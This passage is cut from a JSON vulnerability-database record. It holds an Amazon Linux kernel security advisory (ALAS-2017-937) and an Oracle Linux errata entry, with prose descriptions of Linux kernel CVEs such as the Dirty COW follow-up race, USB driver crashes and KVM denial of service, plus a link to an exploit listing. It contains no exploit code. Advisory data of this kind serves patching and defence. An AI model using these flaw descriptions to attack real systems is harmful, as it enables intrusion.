"https://0day.today/exploit/29141", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "amazon": [{"lastseen": "2020-11-10T12:36:23", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0861", "CVE-2017-16649", "CVE-2017-15115", "CVE-2017-16994", "CVE-2017-16646", "CVE-2017-1000407", "CVE-2017-16647", "CVE-2017-16650", "CVE-2017-16643", "CVE-2016-5195", "CVE-2017-1000405", "CVE-2017-16645"], "description": "**Issue Overview:**\n\nA flaw was found in the patches used to fix the 'dirtycow' vulnerability ([CVE-2016-5195 __](<https://access.redhat.com/security/cve/CVE-2016-5195>)). An attacker, able to run local code, can exploit a race condition in transparent huge pages to modify usually read-only huge pages. ([CVE-2017-1000405 __](<https://access.redhat.com/security/cve/CVE-2017-1000405>))\n\nLinux kernel Virtualization Module (CONFIG_KVM) for the Intel processor family (CONFIG_KVM_INTEL) is vulnerable to a DoS issue. It could occur if a guest was to flood the I/O port 0x80 with write requests. A guest user could use this flaw to crash the host kernel resulting in DoS. ([CVE-2017-1000407 __](<https://access.redhat.com/security/cve/CVE-2017-1000407>))\n\nA BUG in drivers/net/usb/asix_devices.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16647 __](<https://access.redhat.com/security/cve/CVE-2017-16647>))\n\nA BUG in drivers/media/usb/dvb-usb/dib0700_devices.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (BUG and system crash) or possibly have unspecified other impact via a crafted USB device. 
([CVE-2017-16646 __](<https://access.redhat.com/security/cve/CVE-2017-16646>))\n\nThe ims_pcu_get_cdc_union_desc function in drivers/input/misc/ims-pcu.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (ims_pcu_parse_cdc_data out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16645 __](<https://access.redhat.com/security/cve/CVE-2017-16645>))\n\nThe parse_hid_report_descriptor function in drivers/input/tablet/gtco.c in the Linux kernel before 4.13.11 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16643 __](<https://access.redhat.com/security/cve/CVE-2017-16643>))\n\nThe walk_hugetlb_range() function in 'mm/pagewalk.c' file in the Linux kernel from v4.0-rc1 through v4.15-rc1 mishandles holes in hugetlb ranges. This allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call. ([CVE-2017-16994 __](<https://access.redhat.com/security/cve/CVE-2017-16994>))\n\nThe qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16650 __](<https://access.redhat.com/security/cve/CVE-2017-16650>))\n\nThe usbnet_generic_cdc_bind function in drivers/net/usb/cdc_ether.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device. ([CVE-2017-16649 __](<https://access.redhat.com/security/cve/CVE-2017-16649>))\n\nA vulnerability was found in the Linux kernel when peeling off an association to the socket in another network namespace. 
All transports in this association are not to be rehashed and keep using the old key in hashtable, thus removing transports from hashtable when closing the socket, all transports are being freed. Later on a use-after-free issue could be caused when looking up an association and dereferencing the transports. ([CVE-2017-15115 __](<https://access.redhat.com/security/cve/CVE-2017-15115>))\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n perf-4.9.70-22.55.amzn1.i686 \n kernel-4.9.70-22.55.amzn1.i686 \n kernel-debuginfo-common-i686-4.9.70-22.55.amzn1.i686 \n kernel-debuginfo-4.9.70-22.55.amzn1.i686 \n perf-debuginfo-4.9.70-22.55.amzn1.i686 \n kernel-tools-devel-4.9.70-22.55.amzn1.i686 \n kernel-headers-4.9.70-22.55.amzn1.i686 \n kernel-tools-4.9.70-22.55.amzn1.i686 \n kernel-devel-4.9.70-22.55.amzn1.i686 \n kernel-tools-debuginfo-4.9.70-22.55.amzn1.i686 \n \n noarch: \n kernel-doc-4.9.70-22.55.amzn1.noarch \n \n src: \n kernel-4.9.70-22.55.amzn1.src \n \n x86_64: \n kernel-tools-4.9.70-22.55.amzn1.x86_64 \n kernel-devel-4.9.70-22.55.amzn1.x86_64 \n kernel-headers-4.9.70-22.55.amzn1.x86_64 \n kernel-4.9.70-22.55.amzn1.x86_64 \n perf-4.9.70-22.55.amzn1.x86_64 \n kernel-tools-devel-4.9.70-22.55.amzn1.x86_64 \n kernel-tools-debuginfo-4.9.70-22.55.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.9.70-22.55.amzn1.x86_64 \n perf-debuginfo-4.9.70-22.55.amzn1.x86_64 \n kernel-debuginfo-4.9.70-22.55.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2017-12-21T00:02:00", "published": "2017-12-21T00:02:00", "id": "ALAS-2017-937", "href": "https://alas.aws.amazon.com/ALAS-2017-937.html", "title": "Important: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939"], "description": "[4.1.12-124.16.2]\n- netlink: add a start 
callback for starting a netlink dump (Tom Herbert) [Orabug: 27169581] {CVE-2017-16939}\n- ipsec: Fix aborted xfrm policy dump crash (Herbert Xu) [Orabug: 27169581] {CVE-2017-16939}", "edition": 4, "modified": "2018-06-13T00:00:00", "published": "2018-06-13T00:00:00", "id": "ELSA-2018-4131", "href": "http://linux.oracle.com/errata/ELSA-2018-4131.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}